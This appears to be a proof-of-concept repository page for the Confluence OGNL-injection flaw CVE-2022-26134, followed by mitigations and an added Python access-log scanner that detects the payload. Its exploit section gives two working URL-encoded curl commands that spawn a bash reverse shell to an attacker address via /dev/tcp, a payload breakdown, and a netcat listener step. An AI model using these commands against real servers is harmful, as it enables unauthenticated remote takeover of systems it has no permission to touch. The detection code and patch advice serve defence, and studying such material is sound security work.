Related vulnerability
Title:
Atlassian Confluence Server injection vulnerability
(CVE-2022-26134)
Description: Atlassian Confluence Server is the server edition of a collaboration product from the Australian company Atlassian that provides enterprise knowledge management and supports building an enterprise wiki. Atlassian Confluence Server and Data Center contain an injection vulnerability that an attacker can use to execute arbitrary code. The following products and versions are affected: 1.3.0 up to versions before 7.4.17, 7.13.0 up to versions before 7.13.7, 7.14.0 up to versions before 7.14.3, 7.15.0 up to versions before 7.15.2, 7.16.0 up to versions before 7.16.4
Description
Active Exploitation of Atlassian’s Questions for Confluence App CVE-2022-26134
Introduction
# Active Exploitation of Confluence CVE-2022-26134
## Overview
CVE-2022-26134 is a critical **Remote Code Execution (RCE)** vulnerability affecting **Atlassian Confluence**. This vulnerability allows unauthenticated attackers to execute arbitrary code by injecting OGNL expressions into vulnerable endpoints.
## Affected Versions
- All supported versions of **Atlassian Confluence Server** and **Data Center** before the patched release.
## Exploit Details
The following **CURL** command demonstrates the active exploitation of this vulnerability, utilizing Java’s **Nashorn** engine to execute a reverse shell:
```bash
curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/
```
While making these modifications, we also need to take the URL encoding into account. The payload string in the proof-of-concept isn't completely URL encoded. Certain characters (notably ".", "-" and "/") are not encoded. Although it's not always the case, for this exploit, this turns out to be important to the functioning of the payload. If any of these characters are encoded, the server will parse the URL differently, and the payload may not execute. This means we can't apply URL encoding across the whole payload once we've modified it.

```bash
curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.118.4/4444%200%3E%261%27%29.start%28%29%22%29%7D/
```
### Breakdown of the Payload
1. **`${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval(...)}`**
   - The outer `${...}` is the injected OGNL expression; it obtains Java's **Nashorn** script engine and evaluates the JavaScript string passed to `eval`.
2. **`new java.lang.ProcessBuilder().command('bash','-c','bash -i >& /dev/tcp/10.0.0.28/1270 0>&1').start()`**
   - Spawns a reverse shell connecting back to **10.0.0.28:1270** (the `%3E%26` in the encoded payload is `>&`).
## Exploitation Steps
1. Set up a **listener** on your attacking machine:
```bash
nc -lvnp 1270
```
2. Execute the **CURL** exploit command.
3. Upon successful exploitation, you will receive a reverse shell.
## Mitigation
- Atlassian has released **security patches** for affected versions. It is highly recommended to update to the latest version immediately.
- Restrict access to **Confluence servers** from untrusted sources.
- Monitor logs for suspicious requests containing OGNL expressions.
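As an added example (not part of this write-up or the snapshotted repository), the following Python scans constructed access-log lines for the OGNL-injection pattern shown above. Because the payload is only partially URL encoded and may also be double-encoded, the request path is decoded to a fixed point before the indicators are matched; the log format and sample lines are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache/Tomcat common access-log format (the log
# source is an assumption). Request 2 is the encoded OGNL payload shape from the
# write-up with the command replaced by 'id', request 3 is the same construct
# double-URL-encoded, and requests 1 and 4 are benign.
SAMPLE_LOG = """\
10.0.0.28 - - [03/Jun/2022:10:12:01 +0000] "GET /login.action HTTP/1.1" 200 5123
10.0.0.28 - - [03/Jun/2022:10:12:07 +0000] "GET /%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27id%27%29.start%28%29%22%29%7D/ HTTP/1.1" 302 0
10.0.0.28 - - [03/Jun/2022:10:12:09 +0000] "GET /%2524%257Bnew%2520javax.script.ScriptEngineManager%2528%2529%257D/ HTTP/1.1" 302 0
10.0.0.28 - - [03/Jun/2022:10:12:15 +0000] "GET /pages/viewpage.action?pageId=42 HTTP/1.1" 200 8810
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Matched against the *decoded* path: the payload leaves '.', '-' and '/' bare
# but encodes '$', '{', '(' and quotes, so matching the raw URL would miss it.
INDICATORS = {
    "ognl_expression": re.compile(r"\$\{"),
    "script_engine": re.compile(r"javax\.script\.ScriptEngineManager"),
    "process_spawn": re.compile(r"java\.lang\.ProcessBuilder"),
}

def full_decode(path: str, max_rounds: int = 3) -> str:
    """URL-decode until stable (bounded) so double encoding cannot hide '${'."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def scan_access_log(text: str) -> list:
    """Return one finding per request whose decoded path hits an indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected log format
        decoded = full_decode(m["path"])
        hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
        if hits:
            findings.append({"src": m["ip"], "ts": m["ts"], "status": m["status"],
                             "indicators": hits, "decoded_path": decoded})
    return findings
```

Running `scan_access_log(SAMPLE_LOG)` flags requests 2 and 3 only; the benign requests produce no finding.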
## References
- [Atlassian Security Advisory](https://confluence.atlassian.com/security)
- [CVE-2022-26134 Details](https://nvd.nist.gov/vuln/detail/CVE-2022-26134)
## Disclaimer
This documentation is for **educational purposes only**. Unauthorized exploitation of systems is illegal and may result in severe consequences. Always obtain proper authorization before conducting security assessments.
File snapshot
[4.0K] /data/pocs/f3e557607c7d82a2ca304aab01d448308ad88b31
└── [3.0K] README.md
0 directories, 1 file
Notes
1. Accessing the PoC through its original source is preferred.
2. If the source is gone or unreachable, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong (神龙) has snapshotted the PoC code for you; to support long-term maintenance, please consider paying for local PoCs. Thank you for your support.